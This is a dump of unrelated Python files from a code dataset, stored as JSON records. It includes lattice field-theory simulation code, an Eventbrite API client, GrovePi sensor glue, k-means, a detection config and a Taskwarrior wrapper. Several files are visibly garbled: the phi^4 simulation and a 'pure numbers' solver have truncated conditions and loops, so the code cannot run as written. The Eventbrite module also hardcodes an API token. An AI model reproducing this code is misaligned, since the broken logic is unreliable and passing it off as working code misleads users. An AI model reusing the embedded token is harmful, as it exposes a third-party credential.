assert_called_once_with('bar.com', {'1', '2'})\n\n def given_index(self, datastore_mock, storage_mock, emails, resource):\n def store_objects(objs):\n self.stored_ids = list(objs)\n return resource\n self.stored_ids = []\n datastore_mock.fetch_pending_emails.return_value = emails\n storage_mock.store_objects.side_effect = store_objects\n","sub_path":"tests/opwen_email_server/api/test_client_read.py","file_name":"test_client_read.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"92018514","text":"# Copyright (c) 2021 The University of Manchester\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES 
OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom pyNN.standardmodels.synapses import StaticSynapse\nfrom spynnaker.pyNN.models.neuron.synapse_dynamics import (\n SynapseDynamicsStructuralSTDP as\n _BaseClass)\nfrom spynnaker.pyNN.models.neuron.synapse_dynamics.\\\n synapse_dynamics_structural_common import (\n DEFAULT_F_REW, DEFAULT_INITIAL_WEIGHT, DEFAULT_INITIAL_DELAY,\n DEFAULT_S_MAX)\nfrom spynnaker.pyNN.utilities.utility_calls import moved_in_v6\n\n\nclass SynapseDynamicsStructuralSTDP(_BaseClass):\n \"\"\"\n .. deprecated:: 6.0\n Use\n :py:class:`spynnaker.pyNN.models.neuron.synapse_dynamics.SynapseDynamicsStructuralSTDP`\n instead.\n \"\"\"\n __slots__ = []\n\n def __init__(\n self, partner_selection, formation, elimination,\n timing_dependence=None, weight_dependence=None,\n voltage_dependence=None, dendritic_delay_fraction=1.0,\n f_rew=DEFAULT_F_REW, initial_weight=DEFAULT_INITIAL_WEIGHT,\n initial_delay=DEFAULT_INITIAL_DELAY, s_max=DEFAULT_S_MAX,\n seed=None, weight=StaticSynapse.default_parameters['weight'],\n delay=None, backprop_delay=True):\n \"\"\"\n :param AbstractPartnerSelection partner_selection:\n The partner selection rule\n :param AbstractFormation formation: The formation rule\n :param AbstractElimination elimination: The elimination rule\n :param AbstractTimingDependence timing_dependence:\n The STDP timing dependence rule\n :param AbstractWeightDependence weight_dependence:\n The STDP weight dependence rule\n :param None voltage_dependence:\n The STDP voltage dependence (unsupported)\n :param float dendritic_delay_fraction:\n The STDP dendritic delay fraction\n :param int f_rew: How many rewiring attempts will be done per second.\n :param float initial_weight:\n Weight assigned to a newly formed connection\n :param initial_delay:\n Delay assigned to a newly formed connection; a single value means\n a fixed delay value, or a 
tuple of two values means the delay will\n be chosen at random from a uniform distribution between the given\n values\n :type initial_delay: float or tuple(float, float)\n :param int s_max: Maximum fan-in per target layer neuron\n :param int seed: seed the random number generators\n :param float weight: The weight of connections formed by the connector\n :param delay: The delay of connections formed by the connector\n :type delay: float or None\n \"\"\"\n moved_in_v6(\"spynnaker8.models.synapse_dynamics.\"\n \"SynapseDynamicsStructuralSTDP\",\n \"spynnaker.pyNN.models.neuron.synapse_dynamics\"\n \".synapseDynamicsStructuralSTDP\")\n _BaseClass.__init__(\n self, partner_selection, formation, elimination,\n timing_dependence=timing_dependence,\n weight_dependence=weight_dependence,\n voltage_dependence=voltage_dependence,\n dendritic_delay_fraction=dendritic_delay_fraction, f_rew=f_rew,\n initial_weight=initial_weight, initial_delay=initial_delay,\n s_max=s_max, seed=seed, weight=weight, delay=delay,\n backprop_delay=backprop_delay)\n","sub_path":"spynnaker8/models/synapse_dynamics/synapse_dynamics_structural_stdp.py","file_name":"synapse_dynamics_structural_stdp.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"503918385","text":"from setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\n\nwith open(path.join(path.abspath(path.dirname(__file__)), 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='couchbase-stress-testing',\n\n version='1.0.0',\n\n description='Couchbase stress test',\n long_description=long_description,\n\n url='https://github.com/Travix-International/couchbase-stress-testing',\n\n # Author details\n author='Travix Internationals',\n author_email='malsharbaji@travix.com',\n\n # Choose your license\n license='MIT',\n\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment 
:: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n ],\n\n keywords='couchbase stress testing',\n\n packages=find_packages(exclude=['contrib', 'docs', 'tests']),\n\n install_requires=[\n 'couchbase',\n 'requests'\n ],\n\n entry_points={\n 'console_scripts': [\n 'couchbase-stress-test=couchbase_stress_test.__init__:main',\n ],\n },\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"152334295","text":"import urllib.request # urllib.request.urlopen(url)\nimport urllib.parse # urllib.parse.urlencode((parameter, value))\nimport json\n\n\nTOKEN = '77GNIJFPL3PU4ASPFJV5'\nBASE_URL = 'https://www.eventbriteapi.com/v3/events/search/?'\n\ndef build_url(search_query: str, sort_by: str, location_address: str, location_within: str, price: str) -> str:\n \n parameters = urllib.parse.urlencode([('token', TOKEN),('q', search_query),('sort_by', sort_by), ('location.address', location_address), ('location.within', location_within), ('price', price)])\n return BASE_URL + parameters\n\ndef get_dict_from_json(url: str) -> dict:\n response = None\n try:\n response = urllib.request.urlopen(url)\n return json.loads(response.read().decode(encoding = 'utf-8'))\n finally:\n if response != None:\n response.close()\n \ndef parse(json_text: 'json text') -> list:\n result_list = []\n for event in range(len(json_text['events'])):\n try:\n result_list.append(json_text['events'][event]['name']['text']) # can return 'text' or 'html'\n except:\n pass\n return result_list\n \n\n# Test\n# test = parse(get_dict_from_json(build_url('concert', 'date', 'Irvine', 
'10mi', 'free')))\n# for event in test:\n# print(event)","sub_path":"mysite/mysite/EventBriteAPIModule.py","file_name":"EventBriteAPIModule.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"335756223","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pickle\nimport scipy.interpolate as si\nimport numpy.linalg as alg\nfrom math import isfinite\nimport sys\n\n# This code reproduces the algorithm describe in arXiv:1205.3996v4\n# It describes a scalar field under small chemical potential\n# The vector for the position must be given as a list of dimension dim\n\n\n############################ Parameters #######################################\nd = 2 # Dimension of the spatial lattice - d >= 2\nmass = 1 # Mass of the complex scalar field\nmu = float(sys.argv[1]) # Chemical potential\ninteraction = 1 # Value of lambda for the interaction part \nL = 3 # Lattice size x is in [0,L-1]^dim\n#epsilon = 1e-4 # Stepsize for the noise - suff. small for hess. approx\nT = float(sys.argv[2]) # Final time for the integration\nn = int(L**d)\ndr0 = 0.01 # Stepsize for integration\ndr_max=0.1\nprecision = 1e-8\nf = 0.95\nN=100\n\n############################ Useful methods ###################################\n\n# The first step consist in finding the eigenvector in direct space\n\n# Convention in the code - Important to read\n# a vector (0,1,2 ... 
n=L**d=9) represent the point on the lattice in this manner\n# 0 1 2 -> axis 0\n# ( 3 4 5 ) and a position vector has inverse coordinate[id, ..., i1,i0]\n# 6 7 8 so index 2 corresponds to [ 0 2 ] in lattice 3x3\n# | axis 1 go to the bottom\n\ndef position(m):\n \"\"\" Return the position vector on the lattice in function of the place in the vector\n for example the position 6 in basis L=2 and d=3 correspond to\n the position vector [1 1 0]\n It correponds to the conversion from basis 10 to basis L\n \"\"\"\n global L\n x = np.zeros(d,dtype=int)\n i=0\n while(m>0):\n L,m = int(L),int(m)\n x[d-i-1]=m%L\n m = m//L\n i += 1\n p = np.array(x)\n return p\n\ndef index(x):\n \"\"\" Return the place in the vector in function of the position\n The reverse operation from position.\n \"\"\"\n result = 0\n for i in range(len(x)):\n result += x[i]*L**(d-i-1)\n return result\n\ndef kron(a,b):\n if a==b:\n return 1\n else:\n return 0\n\ndef kronecker_pos(x,nu,y):\n \"\"\" Return the kronecker d(x+nu,y). nu cannot be negative.\n x,y are between 0 and n-1, nu between 0 and d-1 \"\"\"\n xp = position(x)\n yp = position(y)\n nu = int(nu)\n add = np.zeros(d,dtype=np.complex)\n add[d-1-nu] = 1\n result = xp + add\n if (result==yp).all():\n return 1\n else:\n return 0\n\ndef kronecker_neg(x,nu,y):\n \"\"\" Return the kronecker d(x-nu,y). 
nu cannot be negative.\n x,y are between 0 and n-1, nu between 0 and d-1 \"\"\"\n xp = position(x)\n yp = position(y)\n nu = int(nu)\n add = np.zeros(d,dtype=np.complex)\n add[d-1-nu] = -1\n result = xp + add\n if (result==yp).all():\n return 1\n else:\n return 0\n\ndef neighbour_pos(lattice,mu):\n \"\"\" Return the lattice of the neighbour in positive direction mu with\n increment 1 \"\"\"\n result = np.zeros(n,dtype=np.complex)\n for i in range(n):\n p = position(i)\n if p[d-1-mu]==L-1:\n p[d-1-mu] = 0\n else:\n p[d-1-mu] += 1\n ind = int(index(p))\n result[i] = lattice[ind]\n return result\n\ndef neighbour_neg(lattice,mu):\n \"\"\" Return the lattice of the neighbour in negative direction mu with\n increment 1 \"\"\"\n result = np.zeros(n,dtype=np.complex)\n for i in range(n):\n p = position(i)\n if p[d-1-mu]==0:\n p[d-1-mu] = L-1\n else:\n p[d-1-mu] -= 1\n ind = int(index(p))\n result[i] = lattice[ind]\n return result\n\n\n\ndef real_evolution(p,q):\n \"\"\" Return the value of the \"real\" part of the derivative of the\n complex conjugated action \"\"\"\n sumoverspace = 0\n for i in range(n):\n sumoverspace += p[i]**2 + q[i]**2\n a = (2*d+mass**2+interaction*sumoverspace)*p\n b = 0\n for nu in range(d):\n b -= np.cosh(mu*kron(nu,0))*(neighbour_pos(p,nu)+neighbour_neg(p,nu))\n b += 1j*np.sinh(mu*kron(nu,0))*(neighbour_neg(q,nu)+neighbour_pos(q,nu))\n result = a+b\n return result\n\ndef imag_evolution(p,q):\n \"\"\" Return the value of the \"real\" part of the derivative of the\n complex conjugated action \"\"\"\n sumoverspace = 0\n for i in range(n):\n sumoverspace += p[i]**2 + q[i]**2\n a = 2*d + mass**2 + interaction*sumoverspace*q\n b = 0\n for nu in range(d):\n b -= np.cosh(mu*kron(nu,0))*(neighbour_pos(q,nu)+neighbour_neg(q,nu))\n b += 1j*np.sinh(mu*kron(nu,0))*(neighbour_pos(p,nu)-neighbour_neg(p,nu))\n result = a+b\n return result\n\ndef delta_phi(phi1,phi2):\n result = 0\n for i in range(n):\n result+= R[i,0,0]*(phi1[i]**2+phi2[i]**2 + 2*phi1[i]**2)\n 
result+= R[i,1,1]*(phi1[i]**2+phi2[i]**2 + 2*phi2[i]**2)\n result+= R[i,0,1]*(2*phi1[i]*phi2[i])\n result+= R[i,1,0]*(2*phi1[i]*phi2[i])\n return np.conj(result)\n\ndef TraceHprim(phi1,phi2):\n return (sum_lambda - delta_phic) + delta_phi(phi1,phi2)\n\ndef RK4_step(phi1,phi2,r,dr):\n \"\"\" Return the result of one step RK4 starting from pi,qi\n at position r with step dr \"\"\"\n pi = phi1\n qi = phi2\n p1 = real_evolution(pi,qi)*dr\n q1 = imag_evolution(pi,qi)*dr\n p2 = real_evolution(pi+0.5*p1,qi+0.5*q1)*dr\n q2 = imag_evolution(pi+0.5*p1,qi+0.5*q1)*dr\n p3 = real_evolution(pi+0.5*p2,qi+0.5*q2)*dr\n q3 = imag_evolution(pi+0.5*p2,qi+0.5*q2)*dr\n p4 = real_evolution(pi+p3,qi+q3)*dr\n q4 = imag_evolution(pi+p3,qi+q3)*dr\n p_next = pi + 1.0/6.0*(p1+2.0*p2+2.0*p3+p4) # Evolution of q\n q_next = qi + 1.0/6.0*(q1+2.0*q2+2.0*q3+q4)\n return p_next,q_next\n\ndef RK4(phi1_0,phi2_0):\n \"\"\" Runge-Kutta order 4 method with adaptative stepsize\n Return the last value p,q, real and imaginary part of the solution\n and the list of r and the corresponding hessian value.\"\"\"\n finite = True\n r=0\n dr = dr0\n r_list = []\n #phi1_list = []\n #phi2_list = []\n det = sum_lambda\n phi1,phi2 = phi1_0,phi2_0\n while r dr_max:\n dr = dr_max\n r = r + dr_old\n if r+dr > T:\n dr = T-r\n phi1,phi2 = RK4_step(phi1_next,phi2_next,r,dr)\n det += trH*dr\n r = T\n #r_list.append(r)\n #phi1_list.append(phi1)\n #phi2_list.append(phi2)\n else:\n phi1,phi2 = phi1_next, phi2_next\n det += trH\n #r_list.append(r)\n #phi1_list.append(phi1)\n #phi2_list.append(phi2)\n else:\n dr = f*dr*(precision/tmp)**0.2\n return phi1, phi2, det, finite\n\ndef S(phi1,phi2):\n result = 0\n a = (d+mass**2/2+interaction/4)*(phi1**2+phi2**2)\n c = 0\n for nu in range(d):\n c -= np.cosh(mu*kron(nu,0))*(phi1*neighbour_pos(phi1,nu)\\\n + phi2*neighbour_pos(phi2,nu))\n c-= 1j*np.sinh(mu*kron(nu,0))*(neighbour_pos(phi1,nu)*phi2\\\n -neighbour_pos(phi2,nu)*phi1)\n for i in range(n):\n result += a[i] + c[i]\n return 
result\n\ndef effective_Action(phi1, phi2 ,det_jac):\n return S(phi1,phi2) - np.log(abs(det_jac))\n\ndef Metropolism(phi1_old, phi2_old, det_jac_old, phi1_new, phi2_new, det_jac_new):\n test = np.exp(-effective_Action(phi1_new, phi2_new, det_jac_new)\\\n +effective_Action(phi1_old, phi2_old,det_jac_old))\n proba = min(1,test)\n x = np.random.random()\n return x 0:\n sum_lambda += w[i]\n positive_eigenspace.append(v[:,i])\n for j in range(n):\n # Note that the eigenvector is v[:,i]\n phi1[j] = v[j,i] + 1j*v[j+2*n,i]\n phi2[j] = v[j+n,i] + 1j*v[j+3*n,i]\n positive_eigenspace_1.append(phi1)\n positive_eigenspace_2.append(phi2)\n\nprint('The dimension of the positive eigenspace is'\n ,len(positive_eigenspace_1))\n\n## Construction of Pn\n#Pn = np.zeros(shape=(2*n,2*n),dtype=np.complex)\n#for i in range(2*n):\n# for j in range(2*n):\n# Pn[j,i] = positive_eigenspace[i][j]\n\n# Here is calculated the stuff needed for the jacobian evo.\n# First the Rx_a,b matrix\nR= []\nfor i in range(n):\n Mab = np.zeros((2,2),dtype=np.complex)\n for j in range(len(positive_eigenspace)):\n Mab[0,0] += positive_eigenspace_1[j][i]**2\n Mab[0,1] += positive_eigenspace_1[j][i]\\\n *positive_eigenspace_2[j][i]\n Mab[1,0] += Mab[0,1]\n Mab[1,1] += positive_eigenspace_2[j][i]**2\n R.append(Mab)\nR = np.array(R)\n# Here calculated the delta_phic\n\nphi1_c = np.zeros(n,dtype=np.complex)\nphi2_c = np.zeros(n,dtype=np.complex)\n\ndelta_phic = delta_phi(phi1_c,phi2_c)\n\nconfig = []\n\n# Initial config at critical point\nphi_0_1 = np.zeros(n,dtype=np.complex)\nphi_0_2 = np.zeros(n,dtype=np.complex)\n#det_0 = alg.det(Pn)\ndet_0 = sum_lambda\ninitial_config = [phi_0_1,phi_0_2,det_0]\n\nconfig.append(initial_config)\nimagS = []\n\nfor i in range(N):\n # Here begins the loop for the N iterations\n print('New iteration')\n phi1, phi2 = proposal(positive_eigenspace_1),\\\n proposal(positive_eigenspace_2)\n phi1,phi2, det ,finite = RK4(phi1,phi2)\n while not(finite):\n phi1, phi2 = 
proposal(positive_eigenspace_1),\\\n proposal(positive_eigenspace_2)\n phi1, phi2, det, finite = RK4(phi1,phi2)\n print(det)\n #det = alg.det(jacobian_evolution(Pn,r_list,phi1_list,phi2_list))\n if Metropolism(phi_0_1,phi_0_2,det_0,phi1,phi2,det):\n phi_0_1 = phi1\n phi_0_2 = phi2\n det_0 = det\n config.append([phi_0_1,phi_0_2,det_0])\n imagS.append(np.imag(S(phi_0_1,phi_0_2)))\n print('Done !')\n print('ImS = ', np.imag(S(phi1,phi2)))\n\nwith open(\"data/config_mu_{0}_T_{1}.txt\".format(mu,T),\"wb\") as fp:\n pickle.dump(config,fp)\n","sub_path":"phi4mu_jac.py","file_name":"phi4mu_jac.py","file_ext":"py","file_size_in_byte":13720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"297726165","text":"import numpy as np\nimport NanoImagingPack as nip\nimport matplotlib.pyplot as plt\nfrom phase_retrieval import fienup_phase_retrieval\n\n\necoli = 'e-coli.png'\nbeads = 'beads_.png'\nfile = ecoli\nobj = nip.readim(file)\nobj = np.squeeze(obj)\nobj = np.mean(obj, axis=0)\n#obj = obj.max() - obj\nnip.view(obj)\n\n#illumination\nsz = obj.shape\nszn = np.array(sz)\nftradius = 5.0\nmyscales = ftradius / szn\nasf = nip.jinc(szn, myscales) # Fourier pattern for pinhole with radius ftradius\nasf = asf / asf.midVal() * np.pi * ftradius ** 2 * nip.gaussian(asf.shape,sigma = 50) # normalize\npsf = nip.abssqr(asf)\npsf /= psf.max()\nnip.view(psf)\n\n'''\ndx=-1\ndy=-1\ncrop_shape=(200,200)\nblocked_area = nip.rr(obj.shape)>1\nblocked_area = nip.extract(blocked_area,crop_shape, centerpos=(blocked_area.shape[0]//2 + dy,blocked_area.shape[1]//2 + dx))\nblocked_area = nip.extract(blocked_area,obj.shape,PadValue=1)\nnip.view(blocked_area)\n'''\n\npimg = nip.abssqr(nip.ft2d(obj*psf))\nphotons = 1000\nnimg = nip.noise.poisson(pimg, NPhot=photons)\n\n#pimg*=blocked_area\n#pimg = nip.extract(np.abs(nip.ft2d(obj*mask)),crop_shape, centerpos=(obj.shape[0]//2 + dy,obj.shape[1]//2 + dx))\n#mask = nip.extract(mask,pimg.shape)\nsupport = 
nip.rr(obj.shape)<200\n\nresult, evol = fienup_phase_retrieval(nimg,mask=support, steps=500,\n verbose=True)\nnip.view(obj*psf)\nnip.view(evol)\n","sub_path":"single-Intensity-ptychography.py","file_name":"single-Intensity-ptychography.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"375202171","text":"import sys\n\nsame_average = False\ncnt = 0\nk = sys.argv[1]\n\ndef argu_check(k,max_iter=200):\n if(('.' in k) or int(k) < 0):\n print(\"Invalid Input\")\n assert()\n if(max_iter != 200):\n if(('.' in max_iter) or int(max_iter) < 0):\n print(\"Invalid Input\")\n assert()\n return int(max_iter)\n\ntry:\n max_iter = sys.argv[2]\n max_iter = argu_check(k,max_iter)\nexcept IndexError:\n max_iter = argu_check(k)\n\nk = int(sys.argv[1])\nclusters = [[] for i in range(k)]\n\ndata_points = []\n\nline = input()\nwhile (line != EOFError):\n data_points.append([float(xi) for xi in line.split(\",\")])\n try: \n line = input()\n except EOFError:\n break\n\nfor i in range(k):\n clusters[i].append(list.copy(data_points[i])) \n clusters[i].append(0)\n clusters[i].append([0.0 for xi in range(len(data_points[i]))])\n\ndef Euclidian_Distance(vector, centroid):\n sum = 0.0\n for xi in range(len(vector)):\n sum += pow((vector[xi]-centroid[xi]),2)\n return sum\n\ndef Update_Mean(clusters, same_average):\n for i in range(k):\n for j in range(len(clusters[i][2])):\n if(clusters[i][2][j]/clusters[i][1] != clusters[i][0][j]):\n same_average = False\n clusters[i][0][j] = clusters[i][2][j]/clusters[i][1]\n return same_average\n\n\ndef Update_Sum_Of_Elements_In_Cluster(float_vector, loc, clusters):\n for i in range(len(float_vector)):\n clusters[loc][2][i] += float_vector[i]\n\ndef Finding_Cluster(float_vector, clusters):\n min_distance, num_of_cluster = -1, -1\n for i in range(k):\n distance = Euclidian_Distance(float_vector, clusters[i][0])\n if((distance < min_distance) or (min_distance < 
0)): #distance is smaller or we are doing the first calc of distance\n min_distance = distance\n num_of_cluster = i\n \n clusters[num_of_cluster][1] += 1 #update number of elements in cluster\n Update_Sum_Of_Elements_In_Cluster(float_vector, num_of_cluster, clusters)\n\n\n \nwhile (cnt < max_iter) and (not same_average):\n same_average = True #will be changed to False if one of the means change\n for vector in data_points:\n Finding_Cluster(vector, clusters)\n same_average = Update_Mean(clusters, same_average) #check if there's no change in mu\n \n for cluster in clusters:\n cluster[1] = 0\n cluster[2] = [0.0 for x in cluster[2]] #initializing clusters properties before next iteration\n\n cnt += 1\n\nfor cluster in clusters:\n print(*[\"{:.4f}\".format(num) for num in cluster[0]],sep=\",\")\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"kMeans.py","file_name":"kMeans.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"194447374","text":"import time\nimport traceback\nfrom grovepi import grovepi\n\nfrom cisco_deviot.gateway import Gateway\nfrom cisco_deviot.thing import Thing\nfrom cisco_deviot.thing import Property\nfrom cisco_deviot import constants\n\npin = {\"A0\":14, \"A1\":15, \"A2\":16, \"D2\":2, \"D3\":3, \"D4\":4, \"D5\":5, \"D6\":6, \"D7\":7, \"D8\":8}\n\n# connect each sensor to a pin \nlight_sensor_pin = pin[\"A2\"]\nled_pin = pin[\"D3\"] \nultrasonic_sensor_pin = pin[\"D4\"]\ntemperature_sensor_pin = pin[\"D7\"]\nbutton_sensor_pin = pin[\"D8\"]\n\ngrovepi.pinMode(light_sensor_pin, \"INPUT\")\ngrovepi.pinMode(led_pin, \"OUTPUT\")\ngrovepi.pinMode(ultrasonic_sensor_pin, \"INPUT\")\ngrovepi.pinMode(temperature_sensor_pin, \"INPUT\")\ngrovepi.pinMode(button_sensor_pin, \"INPUT\")\n\n \n# turn on/off the led when receive action from DevIot\n# action name will be 'on' or 'off'\ndef trigger_grove_led(action):\n print('led get action:' + action)\n if action == 'on':\n 
return lambda:grovepi.digitalWrite(led, 1)\n else:\n return lambda:grovepi.digitalWrite(led, 0)\n\naccount = 'your_id@cisco.com'\napp = Gateway('grovepi', 'deviot.cisco.com', 'deviot.cisco.com:18883', account)\n\n# the parameters of a Thing constructor are: id, display name, kind\nlight_sensor = Thing('grove_light', 'GroveLight', 'light')\nlight_sensor.add_property('light')\nultrasonic_sensor = Thing('grove_distance', 'GroveDistance', 'distance')\nultrasonic_sensor.add_property('distance')\ntemperature_sensor = Thing('grove_temp_hum', 'GroveTempHumd', 'temperature')\ntemperature_sensor.add_property('temperature', 'humidity')\nbutton_sensor = Thing('grove_button', 'GroveButton', 'button')\nbutton_sensor.add_property(Property('value', constants.PROPERTY_TYPE_BOOL))\nled = Thing('grove_led', \"GroveLED\", led)\nled.add_action('on', 'off')\nled.on = trigger_grove_led('on')\nled.off = trigger_grove_led('off')\n\napp.register(light_sensor, ultrasonic_sensor, temperature_sensor, button_sensor, led)\n\napp.start()\n\nwhile True:\n try:\n light_value = grovepi.analogRead(light_sensor_pin)\n [temperature_value, humidity_value] = grovepi.dht(temperature_sensor_pin, 0)\n distance_value = grovepi.ultrasonicRead(ultrasonic_sensor_pin)\n button_value = grovepi.digitalRead(button_sensor_pin)\n \n light_sensor.update_property(light=light_value)\n app.update_thing(light_sensor, light=light_value)\n app.update_thing(temperature_sensor, temperature=temperature_value, humidity=humidity_value)\n app.update_thing(ultrasonic_sensor, distance=distance_value)\n app.update_thing(button_sensor, value=button_value)\n\n time.sleep(0.3)\n except:\n traceback.print_exc()\n break\n\napp.stop()","sub_path":"sample_code_for_GrovePi_sensor.py","file_name":"sample_code_for_GrovePi_sensor.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"321947523","text":"product_family = 'code_activator'\nquestion_type 
= 'input_output'\nhotspot_declarations = {'$out0': 'string'}\ndisplay = r'''\ndef gen_lambda(n):\n\treturn lambda x: n*x\n\nprint gen_lambda(1)(7)\n'''\nargvs = r''''''\nstdin = r''''''\nstdout = r'''$out0\n'''\n","sub_path":"cqg/question_library/python/generate_lambda_io_17/cqg_config.py","file_name":"cqg_config.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"352186359","text":"def Solve (N):\n # your code goes here\n arr, i, start = [\"44\",\"55\"], 2, 1\n if i>=N:\n return arr[N-1]\n while i=N:\n arr=temp\n break\n temp += [\"5\" + a + \"5\" for a in arr]\n i += len(temp)\n arr = temp\n return arr[N-start-1]\n\n\nT = input()\nfor _ in range(T):\n N = input()\n\n out_ = Solve(N)\n print(out_)","sub_path":"LeetCode/InterviewQuestions/PureNumbers.py","file_name":"PureNumbers.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"628797992","text":"_base_ = [\n '../_base_/models/mask_rcnn_r50_fpn.py',\n '../_base_/datasets/coco_instance.py',\n '../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'\n]\n# optimizer\nmodel = dict(\n backbone=dict(\n _delete_=True,\n type='PyramidVisionTransformerV2',\n embed_dims=32,\n num_layers=[2, 2, 2, 2],\n init_cfg=dict(\n checkpoint= # noqa\n 'https://github.com/whai362/PVT/releases/download/v2/pvt_v2_b0.pth' # noqa\n )),\n neck=dict(\n type='FPN',\n in_channels=[32, 64, 160, 256],\n out_channels=256,\n num_outs=5),\n rfsearch_cfg=dict(\n mode='fixed_multi_branch',\n rfstructure_file= # noqa\n './configs/rfnext/search_log/mask_rcnn_pvtv2-b0_fpn_1x_coco/local_search_config_step10.json', # noqa\n config=dict(\n search=dict(\n step=0,\n max_step=11,\n search_interval=1,\n exp_rate=0.5,\n init_alphas=0.01,\n mmin=1,\n mmax=24,\n num_branches=2,\n skip_layer=[])),\n ))\n\n# optimizer\noptimizer = dict(_delete_=True, 
type='AdamW', lr=0.0002, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=None)\n\ncustom_hooks = [\n dict(\n type='RFSearchHook',\n config=model['rfsearch_cfg']['config'],\n mode=model['rfsearch_cfg']['mode'],\n )\n]\n","sub_path":"PanoSeg/RF-mmdetection/configs/rfnext/rfnext_fixed_multi_branch_mask_rcnn_pvtv2-b0_fpn_1x_coco.py","file_name":"rfnext_fixed_multi_branch_mask_rcnn_pvtv2-b0_fpn_1x_coco.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"446107041","text":"from tkinter import *\r\nroot=Tk()\r\nroot.title(\"creating panels or panedwindows\")\r\nroot.geometry(\"500x500\")\r\n#panels\r\npanel_1=PanedWindow(bd=4,relief=RAISED,bg=\"red\")\r\npanel_1.pack(fill=BOTH,expand=1)\r\n\r\nleft_label=Label(panel_1,text=\"Left Panel\")\r\npanel_1.add(left_label)\r\n\r\n#creating second panel\r\npanel_2=PanedWindow(panel_1,orient=VERTICAL,bd=4,relief=RAISED,bg=\"blue\")\r\npanel_1.add(panel_2)\r\n\r\ntop=Label(panel_2,text=\"Top Panel\")\r\npanel_2.add(top)\r\n\r\nbottom=Label(panel_2,text=\"Bottom Panel\")\r\npanel_2.add(bottom)\r\n\r\nroot.mainloop()\r\n","sub_path":"28creating_panedwindows.py","file_name":"28creating_panedwindows.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"184316631","text":"from .commands import Command\nimport shlex\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter.messagebox import *\nimport subprocess\nimport json\n\nclass TaskAPI:\n\tdef __init__(self, logging=False):\n\t\tself.logging = logging\n\t\t\n\tdef fprint(self, message):\n\t\tif self.logging:\n\t\t\tprint(message)\n\t\t\t\n\tdef _formatOutput(self, data):\n\t\tself.fprint(data)\n\t\ttry:\n\t\t\treturn json.loads(data)\n\t\texcept:\n\t\t\treturn str(data, 'latin-1')\n\t\t\n\tdef cmd(self, command):\n\t\tself.fprint(f\"Executing {command}\")\n\t\tif not 
command.startswith(\"task \"):\n\t\t\tcommand = f\"task {command}\"\n\t\t\t\n\t\tcommand = f\"{command} rc.confirmation:0\"\n\t\tself.fprint(f\"Command finalized: {command}\")\n\t\t\n\t\tf = subprocess.run(command.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n\t\t\t\n\t\tif f.stdout:\n\t\t\treturn self._formatOutput(f.stdout)\n\t\telse:\n\t\t\treturn self._formatOutput(f.stderr)\n\t\t\n\tdef add(self, description):\n\t\treturn self.cmd(f'task add {description}')\n\t\n\tdef done(self, _id):\n\t\treturn self.cmd(f'task done {_id}')\t\n\t\n\tdef delete(self, _id):\n\t\treturn self.cmd(f'task delete {_id}')\t\t\n\t\n\tdef export(self, _id = \"\"):\n\t\tif _id:\n\t\t\tf = f'task {str(_id)} export'\n\t\telse:\n\t\t\tf = 'task export'\n\t\t\t\n\t\treturn self.cmd(f)\n\t\t\n\tdef get(self, dom):\n\t\treturn self.cmd(f'task _get {dom}')\n\t\nclass ShowTasks(Command):\n\tdef __init__(self, manager):\n\t\tsuper().__init__(manager)\n\t\tself.alias = ['show tasks', 'list tasks', 'check tasks', 'check task', 'show task']\n\t\tself.check = self.checkMulti\n\t\t\n\tdef run(self, message):\n\t\tt = TaskAPI()\n\t\tresp = t.export(message)\n\t\trespf = self.manager.say\n\t\tif message == \"\":\n\t\t\tself.manager.say(\"Here is a list of your tasks.\")\n\t\t\trespf = self.manager.printf\n\t\t\n\t\tfor item in resp:\n\t\t\tif item['status'] != 'deleted' and 